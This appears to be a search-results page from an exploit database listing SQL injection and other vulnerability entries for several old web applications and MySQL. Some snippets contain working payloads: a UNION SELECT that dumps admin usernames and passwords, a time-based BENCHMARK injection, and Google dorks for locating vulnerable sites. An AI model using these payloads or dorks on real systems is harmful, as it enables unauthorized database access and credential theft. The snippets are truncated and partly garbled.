27 matches found
Sql injection
An issue was discovered in Tilde CMS 1.0.1. Due to missing escaping of the backtick character, a SELECT query in class.SystemAction.php is vulnerable to SQL Injection. The vulnerability can be triggered via a POST request to /actionphp/action.input.php with the id parameter...
IBM DB2 XML/XSLT Function File Read Vulnerability
IBM DB2 is a set of relational database management system developed by IBM in the United States, and its main operating environments are UNIX including IBM's own AIX, Linux, IBM i formerly known as OS/400, z/OS, and Windows server versions. IBM DB2 has a security vulnerability that allows...
Simple Free PHP Forum Script 1 SQL Injection
Exploit Title: Simple Free PHP Forum Script 1,BENCHMARK500000000,MD5CHAR115,113,108,109,97,112,0 AND id='1 wget "http://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF21,BENCHMARK500000000,MD5CHAR115,113,108,109,97,112,0 AND id='1" -------------- Vurnerable Code -------------- Line 150 of...
MASA2EL Music City v1. 0 remote injection vulnerability+exploit code-exploit warning-the black bar safety net
google:Powered By : MASA2EL Music City 1.0 Trojandownloader:http://server/path/index. php? go=singer&id=-13//union//select//1,concatUserName,0x3a,PasSword,3,4//from//masa2eladmin--...
MySQL COM_TABLE_DUMP Information Leakage and Arbitrary Command Execution
No description provided by source. / April 21.st 2006 myexploit.c MySql COMTABLEDUMP Memory Leak & MySql remote B0f MySql = 5.0.20 MySql COMTABLEDUMP Memory Leak MySql = 4.x.x copyright 2006 Stefano Di Paola stefano.dipaolaatwisec.it GPL 2.0 Disclaimer: In no event shall the author be liable for...
Joomla! Component com_bookJoomlas 0.1 - SQL Injection
Joomla! Component combookJoomlas 0.1 - SQL Injection Salvatore "drosophila" Fresta + Application: Joomla Component combookjoomlas + Version: 0.1 + Website: http://www.alikonweb.it + Bugs: A SQL Injection + Exploitation: Remote + Dork: inurl:"index.php?option=combookjoomlas" + Date: 06 Apr 2009 +...
iG Shop 1.4 - page.php SQL Injection
iG Shop 1.4 - page.php SQL Injection Discovered by: gsy & kerem125 Website: www.kerem125.com Script Download: http://www.igeneric.co.uk/ig-shopping-cart.html exploit:/shop/page.php?pagetype=catalognavigate&typeid=-99%20union//select//password//from//users/...